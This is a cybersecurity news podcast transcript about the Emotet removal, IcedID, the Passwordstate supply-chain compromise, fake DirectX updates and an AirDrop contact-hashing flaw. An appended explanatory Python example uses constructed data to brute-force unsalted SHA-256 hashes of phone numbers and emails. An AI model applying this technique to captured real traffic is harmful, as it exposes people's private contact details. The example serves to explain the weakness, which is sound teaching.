Emotet wiped from servers, Passwordstate password manager compromised and be careful with Apple AirDrop file sharing
Welcome to Cyber Security Today. It’s Monday April 26th. I’m Howard Solomon, contributing reporter on cybersecurity for ITWorldCanada.com.
Some good news for information security professionals: Yesterday the remnants of the Emotet backdoor were automatically removed from infected computers and servers. This means the Emotet implant itself can no longer be used to attack those machines. The removal was promised in January, when law enforcement agencies around the world took over the infrastructure behind the Emotet botnet. Over several years the botnet was used by crooks to spread malware and ransomware to an estimated 1.7 million computers through infected email attachments. Taking over the infrastructure cut the implants off from their command-and-control servers. The three-month delay gave IT staff time to hunt for and delete the other malware Emotet had delivered, because the automatic removal only takes out Emotet, not what it dropped.
Unfortunately another operation has moved to fill the vacuum left by Emotet’s disappearance. Recorded Future says a malware family called IcedID is gaining popularity as a malware-as-a-service loader used by other gangs to distribute infections. Older families like Dridex, Trickbot and Qakbot are also seeing increased use of their infrastructure. But researchers report that use of IcedID has accelerated. Check Point Software says that IcedID was the second most prevalent malware in March, behind Dridex. Like Dridex and others, IcedID looks first for login passwords to steal. (CORRECTION: The podcast wrongly attributed the March report to Kaspersky)
Listeners already know about the attack on SolarWinds’ Orion network management platform. Attackers compromised the process that builds and distributes Orion updates and used it to push malware to customers. Other hacking groups are copying the idea. A Dutch cybersecurity company reports that the makers of a corporate password manager called Passwordstate are notifying customers that updates downloaded between April 20 and April 22 were compromised. The tainted update installed code that allows further malware to be downloaded. Click Studios, which makes Passwordstate, has 29,000 business and government customers around the world. If your organization uses it and applied an update in that window, treat every credential stored in it as exposed: all passwords, including those for equipment like VPNs and firewalls, need to be reset.
I regularly remind listeners to make sure they’re running the latest versions of their software to protect against cyber attacks. But you also have to make sure you’re downloading updates from a safe website. Crooks are known to create websites distributing fake security updates. One of the latest targets DirectX, Microsoft’s set of multimedia and gaming components. A game or video may say it needs the latest version of DirectX, so users go hunting on the internet. Crooks count on that, so they create sites hoping people will click on their malicious “updates.” DirectX is made by Microsoft, and on supported versions of Windows it is built into the operating system and updated through Windows Update, so a microsoft.com download is the only legitimate source for any standalone installer. The same goes for any update: get it only from the software maker’s site, check that the address really is the maker’s domain, and confirm the installer carries the maker’s digital signature before running it.
Finally, researchers warn owners of Apple devices to be careful using the AirDrop feature. It transfers files over WiFi and Bluetooth, and in its default mode only between people who are on each other’s contact lists. The problem is in the wireless exchange one Apple device uses to check whether it is in another device’s contact list. That exchange doesn’t adequately protect the phone numbers and email addresses involved: they are sent in a hashed form that is easy to reverse, because phone numbers and common email addresses are drawn from a small enough space to guess exhaustively. A hacker nearby could record the exchange and recover the contact details offline. One solution is enabling AirDrop only when needed. Another is to avoid sending files this way in public places like hotels, restaurants, airports and convention centres where hackers may be lurking.
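The following is an added example, not code from the podcast or from Apple, showing why hashing alone does not hide a phone number or email address. It assumes, as the published research described, that the contact check carries plain SHA-256 hashes of the identifiers with no salt or secret key; the exact normalization Apple applies, the phone number, the email address and the candidate lists are all constructed for the demonstration.

```python
import hashlib
import itertools

# ASSUMPTION for this example: identifiers are hashed with unsalted SHA-256
# and hex encoded. Apple's real normalization rules are not modelled here.
def identifier_hash(identifier: str) -> str:
    return hashlib.sha256(identifier.encode("utf-8")).hexdigest()


def recover_phone(target_hash: str, known_prefix: str, unknown_digits: int):
    """Enumerate every number that shares known_prefix (country code, area
    code, exchange...) and return the one whose hash matches, else None.
    A full 10-digit North American number is at most 10**10 candidates; an
    attacker who knows the area code is down to 10**7."""
    for n in range(10 ** unknown_digits):
        candidate = f"{known_prefix}{n:0{unknown_digits}d}"
        if identifier_hash(candidate) == target_hash:
            return candidate
    return None


def recover_email(target_hash: str, local_parts, domains):
    """Dictionary attack: try common local parts against likely domains."""
    for local, domain in itertools.product(local_parts, domains):
        candidate = f"{local}@{domain}"
        if identifier_hash(candidate) == target_hash:
            return candidate
    return None


def brute_force_seconds(candidates: int, hashes_per_second: float) -> float:
    """Worst-case time to exhaust a candidate space at a given hash rate."""
    return candidates / hashes_per_second


# Constructed victim identifiers: what the victim's device would hash and
# transmit during the contact check, as captured by a nearby listener.
VICTIM_PHONE = "+14165550123"          # constructed, not a real subscriber
VICTIM_EMAIL = "jane.doe@example.com"  # constructed
OBSERVED_HASHES = [identifier_hash(VICTIM_PHONE), identifier_hash(VICTIM_EMAIL)]

# Constructed attacker knowledge: a Toronto 416-555 prefix and a short
# name list, standing in for the larger dictionaries a real attacker would use.
KNOWN_PREFIX = "+1416555"
COMMON_LOCAL_PARTS = ["admin", "info", "john.doe", "jane.doe", "jdoe"]
LIKELY_DOMAINS = ["example.org", "example.com", "gmail.com"]


def demo():
    """Recover both constructed identifiers from their observed hashes."""
    phone = recover_phone(OBSERVED_HASHES[0], KNOWN_PREFIX, 4)
    email = recover_email(OBSERVED_HASHES[1], COMMON_LOCAL_PARTS, LIKELY_DOMAINS)
    return phone, email


if __name__ == "__main__":
    phone, email = demo()
    print("recovered phone:", phone)
    print("recovered email:", email)
    # Every 10-digit number at a modest 10 million SHA-256/s on one GPU:
    print("seconds to exhaust 10**10 numbers:",
          brute_force_seconds(10 ** 10, 1e7))
```

The point of the example is the size of the search space, not the speed of the code: with the prefix known, four unknown digits fall to a trivial loop, and even the full ten-digit space takes on the order of a thousand seconds at rates a single graphics card can sustain, so an unsalted hash is effectively the identifier in the clear. Hiding a membership check properly needs a construction where the observer cannot guess offline, such as a keyed hash under a secret the two devices agree on, or a private set intersection protocol, which is the direction the researchers proposed.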
Follow Cyber Security Today on Apple Podcasts, Google Podcasts or add us to your Flash Briefing on your smart speaker.